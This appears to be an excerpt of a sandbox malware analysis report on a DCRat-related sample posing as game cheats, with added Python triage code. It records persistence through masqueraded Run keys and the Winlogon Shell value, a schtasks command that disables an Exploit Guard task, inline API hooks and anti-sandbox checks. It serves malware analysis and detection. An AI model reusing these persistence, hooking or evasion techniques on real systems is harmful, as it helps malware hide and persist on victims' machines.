Source: C:\blockweb\portrefNet.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (18 identical entries)
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\Default\ApplicationFrameHost.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
Source: C:\blockweb\portrefNet.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
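The entries above record the shape of the persistence but not the registry data behind it: Winlogon\Shell is rewritten, Run values are named after Windows system processes (WmiPrvSE, RuntimeBroker, ApplicationFrameHost, SgrmBroker, dwm), PE files land in C:\Users\Default and directly in the user profile root, and a built-in Exploit Guard scheduled task is disabled. The Python below is an added triage example, not part of the Joe Sandbox report or of any tool it names; it applies those four checks to registry and process-creation observations. The value data in SAMPLE_ENTRIES is constructed for illustration (the report lists only the value names and the dropped-file paths, not what each value points at), and the list of impersonated system binary names is the example's own.

```python
"""Triage autostart entries and scheduled-task changes of the kind recorded above.

Added example, not part of the Joe Sandbox report. The registry value data in
SAMPLE_ENTRIES is constructed: the report records value names and dropped-file
paths, not what each value points at.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Names of Windows binaries that the report shows being reused as Run value names,
# plus a few more common lures. Genuine copies live under System32 / SysWOW64.
SYSTEM_BINARY_NAMES = {
    "wmiprvse", "runtimebroker", "applicationframehost", "sgrmbroker", "dwm",
    "svchost", "lsass", "csrss", "winlogon", "explorer", "conhost", "taskhostw",
}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RUN_KEY = r"software\microsoft\windows\currentversion\run"
WINLOGON_KEY = r"software\microsoft\windows nt\currentversion\winlogon"


@dataclass
class AutostartEntry:
    hive: str   # "HKLM" or "HKCU"
    key: str    # subkey path below the hive
    name: str   # value name
    data: str   # value data: an image path or a command line


def image_path(command_line: str) -> str:
    """Executable path of a command line: the quoted token if present, else the first token."""
    command_line = command_line.strip()
    quoted = re.match(r'"([^"]+)"', command_line)
    return quoted.group(1) if quoted else command_line.split(" ", 1)[0]


def triage_autostart(entry: AutostartEntry) -> List[str]:
    """Return findings for one autostart entry; an empty list means nothing suspicious."""
    findings: List[str] = []
    key = entry.key.lower().strip("\\")
    path = image_path(entry.data).lower()
    basename = path.rsplit("\\", 1)[-1]
    stem = basename[:-4] if basename.endswith(".exe") else basename

    if key == WINLOGON_KEY and entry.name.lower() == "shell":
        # The stock value is exactly "explorer.exe"; malware appends to or replaces it.
        extras = [p.strip() for p in entry.data.split(",") if p.strip().lower() != "explorer.exe"]
        if extras:
            findings.append(f"Winlogon Shell hijacked: also launches {extras}")

    if key == RUN_KEY:
        masquerades = entry.name.lower() in SYSTEM_BINARY_NAMES or stem in SYSTEM_BINARY_NAMES
        if masquerades and not path.startswith(SYSTEM_DIRS):
            findings.append(f"Run value {entry.name!r} uses a system binary name but runs {path}")
        if path.startswith("c:\\users\\default\\"):
            findings.append(f"image in the Default profile, inherited by every new account: {path}")
        elif re.fullmatch(r"c:\\users\\[^\\]+\\[^\\]+\.exe", path):
            findings.append(f"PE placed directly in a user profile root: {path}")
    return findings


# Matches the "/Change ... /Disable" form seen above, restricted to built-in tasks.
SCHTASKS_DISABLE = re.compile(
    r'schtasks(?:\.exe)?\s+/change\s+/tn\s+"?(microsoft\\windows\\[^"]+?)"?\s+/disable',
    re.IGNORECASE,
)


def disabled_microsoft_task(command_line: str) -> Optional[str]:
    """Task path if the command line disables a Microsoft\\Windows scheduled task, else None."""
    m = SCHTASKS_DISABLE.search(command_line)
    return m.group(1) if m else None


SAMPLE_ENTRIES = [  # constructed data; names and paths are taken from the report entries
    AutostartEntry("HKLM", r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell",
                   r"explorer.exe, C:\blockweb\portrefNet.exe"),
    AutostartEntry("HKCU", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ApplicationFrameHost",
                   r"C:\Users\Default\ApplicationFrameHost.exe"),
    AutostartEntry("HKCU", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ukzoUeHPfeDwGdTDRNL",
                   r"C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"),
    AutostartEntry("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dwm",
                   r"C:\blockweb\portrefNet.exe"),
    AutostartEntry("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
                   r"C:\Windows\System32\SecurityHealthSystray.exe"),   # benign control
]
SAMPLE_COMMAND = r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable'

if __name__ == "__main__":
    for e in SAMPLE_ENTRIES:
        for f in triage_autostart(e):
            print(f"{e.hive}\\{e.key} [{e.name}] -> {f}")
    print("disabled task:", disabled_microsoft_task(SAMPLE_COMMAND))
```

To run this over real telemetry, build AutostartEntry objects from Sysmon event 13 (TargetObject and Details) or an autoruns export. The checks key on the value name as well as the image path on purpose: in the report the lure is in the name (dwm, RuntimeBroker, SgrmBroker) while the writer is C:\blockweb\portrefNet.exe, so a path-only rule would miss the masquerade when the data field is unavailable.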

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 1C60005 value: E9 2B BA 26 75
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 76ECBA30 value: E9 DA 45 D9 8A
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 1DC0008 value: E9 8B 8E 15 75
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 76F18E90 value: E9 80 71 EA 8A
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2020005 value: E9 8B 4D BD 73
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 75BF4D90 value: E9 7A B2 42 8C
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2040005 value: E9 EB EB BC 73
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 75C0EBF0 value: E9 1A 14 43 8C
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2050005 value: E9 8B 8A F8 72
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 74FD8A90 value: E9 7A 75 07 8D
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2060005 value: E9 2B 02 FA 72
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 75000230 value: E9 DA FD 05 8D
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2070005 value: E9 8B 2F E9 74
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 76F02F90 value: E9 7A D0 16 8B
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 2080007 value: E9 EB DF EB 74
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 7344 base: 76F3DFF0 value: E9 1E 20 14 8B
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 1970005 value: E9 2B BA 55 75
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 76ECBA30 value: E9 DA 45 AA 8A
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 1980008 value: E9 8B 8E 59 75
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 76F18E90 value: E9 80 71 A6 8A
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 1A90005 value: E9 8B 4D 16 74
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 75BF4D90 value: E9 7A B2 E9 8B
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 3680005 value: E9 EB EB 58 72
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 75C0EBF0 value: E9 1A 14 A7 8D
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 3690005 value: E9 8B 8A 94 71
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 74FD8A90 value: E9 7A 75 6B 8E
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 36A0005 value: E9 2B 02 96 71
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 75000230 value: E9 DA FD 69 8E
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 36B0005 value: E9 8B 2F 85 73
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 76F02F90 value: E9 7A D0 7A 8C
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 36C0007 value: E9 EB DF 87 73
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Memory written: PID: 7972 base: 76F3DFF0 value: E9 1E 20 78 8C
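Every "Memory written" entry above is five bytes beginning with E9, the x86 near-jump opcode followed by a signed 32-bit displacement, and the writes come in pairs: one at a 16-byte-aligned address in the 0x74000000 to 0x76FFFFFF range (presumably a function start inside a loaded DLL) and one at a low address five to eight bytes into a fresh page (the trampoline holding the displaced prologue bytes). The Python below is an added example, not part of the Joe Sandbox report; it decodes each displacement into its absolute destination and pairs every hooked prologue with the trampoline that jumps back into it. REPORT_PATCHES is copied from the entries above with the Source prefix dropped. The pairing rule (the trampoline's return jump sits exactly `stolen` bytes into a page-aligned region) is an inference from these addresses, not something the report states, and the report does not name which exported functions live at the hooked addresses.

```python
"""Decode the code patches recorded above and pair each hooked prologue with its trampoline.

Added example, not part of the Joe Sandbox report. REPORT_PATCHES is copied from the
"Memory written" entries above with the Source prefix dropped; everything else is the
example's own.
"""
import re
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

PATCH_RE = re.compile(r"PID:\s*(\d+)\s+base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}\s*)+)")

REPORT_PATCHES = """
PID: 7344 base: 1C60005 value: E9 2B BA 26 75
PID: 7344 base: 76ECBA30 value: E9 DA 45 D9 8A
PID: 7344 base: 1DC0008 value: E9 8B 8E 15 75
PID: 7344 base: 76F18E90 value: E9 80 71 EA 8A
PID: 7344 base: 2020005 value: E9 8B 4D BD 73
PID: 7344 base: 75BF4D90 value: E9 7A B2 42 8C
PID: 7344 base: 2040005 value: E9 EB EB BC 73
PID: 7344 base: 75C0EBF0 value: E9 1A 14 43 8C
PID: 7344 base: 2050005 value: E9 8B 8A F8 72
PID: 7344 base: 74FD8A90 value: E9 7A 75 07 8D
PID: 7344 base: 2060005 value: E9 2B 02 FA 72
PID: 7344 base: 75000230 value: E9 DA FD 05 8D
PID: 7344 base: 2070005 value: E9 8B 2F E9 74
PID: 7344 base: 76F02F90 value: E9 7A D0 16 8B
PID: 7344 base: 2080007 value: E9 EB DF EB 74
PID: 7344 base: 76F3DFF0 value: E9 1E 20 14 8B
PID: 7972 base: 1970005 value: E9 2B BA 55 75
PID: 7972 base: 76ECBA30 value: E9 DA 45 AA 8A
PID: 7972 base: 1980008 value: E9 8B 8E 59 75
PID: 7972 base: 76F18E90 value: E9 80 71 A6 8A
PID: 7972 base: 1A90005 value: E9 8B 4D 16 74
PID: 7972 base: 75BF4D90 value: E9 7A B2 E9 8B
PID: 7972 base: 3680005 value: E9 EB EB 58 72
PID: 7972 base: 75C0EBF0 value: E9 1A 14 A7 8D
PID: 7972 base: 3690005 value: E9 8B 8A 94 71
PID: 7972 base: 74FD8A90 value: E9 7A 75 6B 8E
PID: 7972 base: 36A0005 value: E9 2B 02 96 71
PID: 7972 base: 75000230 value: E9 DA FD 69 8E
PID: 7972 base: 36B0005 value: E9 8B 2F 85 73
PID: 7972 base: 76F02F90 value: E9 7A D0 7A 8C
PID: 7972 base: 36C0007 value: E9 EB DF 87 73
PID: 7972 base: 76F3DFF0 value: E9 1E 20 78 8C
"""


def jmp_target(base: int, code: bytes) -> Optional[int]:
    """Destination of an x86 'E9 rel32' near jump written at `base`, or None if not one.
    rel32 is a signed displacement from the end of the 5-byte instruction."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel = struct.unpack_from("<i", code, 1)[0]
    return (base + 5 + rel) & 0xFFFFFFFF


def decode_patches(text: str) -> List[Tuple[int, int, int]]:
    """(pid, patched address, jump destination) for every E9 write in the report text."""
    out = []
    for pid, base, hexbytes in PATCH_RE.findall(text):
        target = jmp_target(int(base, 16), bytes.fromhex(hexbytes))  # fromhex skips whitespace
        if target is not None:
            out.append((int(pid), int(base, 16), target))
    return out


def pair_hooks(text: str, max_stolen: int = 16) -> List[Dict[str, int]]:
    """Match each patched function start with the trampoline that jumps back into it.

    An inline hook overwrites the first bytes of a function with a jmp to a handler and
    copies the displaced ("stolen") bytes to a trampoline that ends with a jmp back to
    hooked + stolen. Assumption drawn from these addresses, not stated by the report:
    every trampoline starts on a fresh page, so its return jmp sits exactly `stolen`
    bytes into the page. That asymmetry tells the two jumps of a pair apart.
    """
    by_pid: Dict[int, List[Tuple[int, int]]] = defaultdict(list)
    for pid, base, target in decode_patches(text):
        by_pid[pid].append((base, target))
    hooks = []
    for pid, patches in sorted(by_pid.items()):
        for tramp, back in patches:
            for hooked, handler in patches:
                stolen = back - hooked
                if hooked != tramp and 0 < stolen <= max_stolen and (tramp & 0xFFF) == stolen:
                    hooks.append({"pid": pid, "hooked": hooked, "handler": handler,
                                  "trampoline": tramp, "stolen": stolen})
    return hooks


if __name__ == "__main__":
    for h in pair_hooks(REPORT_PATCHES):
        print(f"PID {h['pid']}: {h['hooked']:08X} -> handler {h['handler']:08X}; "
              f"trampoline at {h['trampoline']:08X} returns to {h['hooked'] + h['stolen']:08X} "
              f"({h['stolen']} stolen bytes)")
```

Decoded, both processes (PIDs 7344 and 7972) patch the same eight addresses with the same stolen-byte counts (five bytes for six of them, eight and seven for the other two), which is what two instances of the same code hooking the same system DLLs look like, since those DLLs share one load address across processes for a boot session. To put names on the hooked addresses, resolve each `hooked` value against the module list of the live process or the sandbox memory dump; the report itself only gives the raw addresses.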
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX (50 identical entries)
                        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX (5 identical entries)
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exe Process information set: NOOPENFILEERRORBOX (49 identical entries)

                        Malware Analysis System Evasion

                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: Lunch LaCheatV2.exe, 00000001.00000002.1767574867.0000000000408000.00000020.00000001.01000000.00000005.sdmp Binary or memory string: Q|SBIEDLL.DLL
                        Source: Lunch LaCheat.exe, 00000022.00000002.1811959348.0000000000408000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: )SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F5F24BCA93Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F5F257E2C1Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe RDTSC instruction interceptor: First address: 16DB1F3 second address: 174113A instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 rol cl, 1 0x00000006 shrd dx, bp, 00000038h 0x0000000b or dx, 3F3Eh 0x00000010 add cl, 0000001Ah 0x00000013 jmp 00007F5F24C57122h 0x00000018 neg cl 0x0000001a rdtsc
